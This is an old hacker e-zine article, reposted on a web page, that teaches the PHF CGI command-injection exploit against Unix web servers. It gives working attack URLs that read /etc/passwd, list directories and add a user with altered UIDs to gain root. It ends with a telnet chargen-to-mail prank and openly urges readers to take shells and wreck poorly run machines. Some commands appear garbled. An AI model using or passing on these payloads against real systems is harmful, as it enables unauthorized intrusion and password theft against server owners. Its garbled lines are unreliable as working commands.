The PHF bug @ Matarese.com

Click here to find books related to 'web security'.

Ś R E A L I T Y C H E C K N E T W O R K! Ś_ +----------------------------------------------------------------------------Ś_ Ś Ś Ś From Issue #33 - PHF Web Hacking Ś Ś by Dagashi Ś Ś____________________________________________________________________________Ś_ Ś____________________________________________________________________________Ś_ +----------------------------------------------------------------------------Ś_ Ś Ś_ Ś Alright there kiddies, it's time to lightly dive into the world of Ś_ Ś how to obtain shells that do not rightfully belong to you and how to Ś_ Ś generally piss off people on the Internet. As always, this is a well Ś_ Ś known bit on information (because no one in their right mind would give Ś_ Ś you an exploit to a system that no one else knows of), so I take no Ś_ Ś responsibility for whatever you do with it. Ś_ Ś Ś_ Ś Since the majority of computers on the Internet are of UNIX decent, Ś_ Ś I will be mainly talk about their problems and such. Now, the majority Ś_ Ś of us know that UNIX is full of holes and other problems no matter what Ś_ Ś revisions and patches are made, so this might not come as a big surprise Ś Ś when I tell you there is a common exploit that will run any program on Ś Ś your victim machine. It is the PHF hack. Though it is no big deal to Ś Ś the majority of ISP's, most little companies do not have the time or Ś Ś money to deal with all the problems of their operating systems. Small Ś Ś schools that are NOT technologically oriented, like high schools with Ś Ś T1's and such would be a good example. And so, this will work on some Ś Ś of them. Ś Ś Ś Ś All that is required to be done is to put this into the URL of Ś Ś Netscape: Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Ś Ś Ś Ś and you have a listing of the passwd file to use or abuse. But the Ś Ś PHF exploit can do more then just that (for those of you who will be Ś Ś flaming me for writing such a simple article). It can access any type Ś Ś of program that is on the opposing computer and run it. Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ Ś Ś Ś Ś will give you the directory listing of everything from the root of Ś Ś the system. From there, you can just alter it accordingly to have a Ś Ś peek around the system to see what else you can learn. Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin Ś Ś Ś Ś would show you every command that is available in the bin dir. If Ś Ś you slightly modified it, you would also be able to see the permissions Ś Ś of the specific files. Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin Ś Ś Ś Ś which can come in handy since, well, seeing as how you have root Ś Ś permissions you now have a nice little bit of information about how the Ś Ś system functions can use that to get even more access or information out Ś Ś of it. Ś Ś Ś Ś Or the best one of them all: Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi Ś Ś %20dagashi%20100%20 Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0 Ś Ś Ś Ś http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500 Ś Ś Ś Ś Do that and you MIGHT have root access to the server by telnet. Be Ś Ś forewarned that this is an old hack and many servers would not have the Ś Ś PHF script still running or have chmoded it to 000. This can get you Ś Ś into a bunch of trouble, so be careful. As I said before, this is well Ś Ś known and I wouldn't give it out to you unless most system Ś Ś administrators (if they deserve the title then they know this hack by Ś Ś heart) knew it as well. But there are always those that don't deserve Ś Ś the honor of the name, and to those, you have my full consent to fuck up Ś Ś their machines to hell. Ś Ś Ś Ś For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1 Ś Ś 25" in Linux and watch life become a ball. Ś Ś Ś +----------------------------------------------------------------------------+